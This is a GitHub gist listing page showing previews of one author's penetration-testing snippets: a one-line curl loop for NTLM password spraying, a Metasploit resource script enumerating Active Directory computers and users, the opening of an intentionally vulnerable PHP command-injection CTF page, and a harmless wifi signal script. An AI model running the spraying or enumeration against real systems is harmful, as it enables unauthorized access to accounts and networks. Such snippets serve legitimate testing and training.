WJDigby
/ gist:e4245de93d0c0fc46ab025ae48e5db5a
Created
August 14, 2017 12:21
NTLM Authentication password-spraying via curl
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| while read user; do curl --ntlm -u '"$user":PASSWORD' URI -w 'size: %{size_download}\n' -o /dev/null; done < userlist.txt |
WJDigby
/ launch_rdesktop.rb
Last active
October 26, 2015 20:00
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ## | |
| # This module requires Metasploit: http://metasploit.com/download | |
| # Current source: https://github.com/rapid7/metasploit-framework | |
| ## | |
| require 'msf/core' | |
| class Metasploit3 < Msf::Auxiliary | |
| def initialize |
WJDigby
/ automate_enum_ad_computers.rc
Last active
July 7, 2016 11:44
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| use post/windows/gather/enum_ad_computers | |
| set FIELDS distinguishedName,dNSHostname,description,operatingSystem,operatingSystemServicePack | |
| set FILTER (&(objectCategory=computer)(userAccountControl:1.2.840.113556.1.4.803:=8192)) | |
| run | |
| set FILTER (&(objectCategory=computer)(operatingSystem=*server*)(!(userAccountControl:1.2.840.113556.1.4.803:=8192))) | |
| run | |
| set FILTER (&(objectCategory=computer)(!(operatingSystem=*server*))) | |
| run | |
| set FIELDS distinguishedName,name,mail,description | |
| set FILTER (&(objectCategory=person)(objectClass=user)(!(userAccountControl:1.2.840.113556.1.4.803:=2))) |
WJDigby
/ injection.php
Last active
August 29, 2015 14:19
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <!DOCTYPE html> | |
| <html> | |
| <head> | |
| <title>PHP OS Command Injection</title> | |
| <!-- Adapted from the SecureState 2015 High School CTF http://www.mountunion.edu/information-security-challenge-slated-for-saturday --> | |
| <!-- Originally hosted at http://warroom.securestate.com --> | |
| </head> | |
| <body> | |
| <h1>MD5 Hashing</h1> | |
| <br /> |
WJDigby
/ wifi_measure
Last active
August 29, 2015 14:13
Get average signal quality and power level from /proc/net/wireless.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/bash | |
| #The War Room Blog | |
| #http://warroom.securestate.com/index.php/cya-cover-your-alfa-part-ii/ | |
| x=1 # set the variables | |
| HIGH_QUAL=$(cat /proc/net/wireless | awk 'END { print $3 }' | sed 's/\.$//') # parse the output of /proc/net/wireless to get integers only | |
| LOW_QUAL=$(cat /proc/net/wireless | awk 'END { print $3 }' | sed 's/\.$//') | |
| AVG_QUAL=$(cat /proc/net/wireless | awk 'END { print $3 }' | sed 's/\.$//') | |
| HIGH_LVL=$(cat /proc/net/wireless | awk 'END { print $4 }'| sed 's/\.$//') | |
| LOW_LVL=$(cat /proc/net/wireless | awk 'END { print $4 }'| sed 's/\.$//') | |
| AVG_LVL=$(cat /proc/net/wireless | awk 'END { print $4 }'| sed 's/\.$//') |
NewerOlder